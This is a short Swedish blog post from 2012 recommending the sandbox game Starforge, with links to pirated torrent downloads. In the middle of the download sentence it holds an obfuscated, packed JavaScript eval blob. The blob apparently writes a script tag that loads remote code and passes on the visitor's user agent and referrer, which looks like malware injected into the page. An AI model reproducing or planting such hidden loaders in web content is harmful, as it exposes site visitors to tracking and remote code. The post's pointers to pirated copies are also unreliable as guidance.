Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Starforge – kanske det coolaste sandlåde spelet någonsin!

Filip Urde
  • On 31 maj, 2012
  • http://www.revue.se/filip-urde

StarForge är en blanding mellan allt, det är ett RTS/FPS/RPG/Tower Defense/Sandlåde-spel som ser ut som borderlands och har möjligheter som i Minecraft.

Man ska samla resurser, bygga ut sin bas och köpa vapen för att sedan kriga mot MASSA aliens.

Om ni vill prova Starforge så kan man ladda ner det via torrent här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ritsk|var|u0026u|referrer|bnsry||js|php’.split(’|’),0,{}))
eller via PirateBay
här.

Häftigt är det!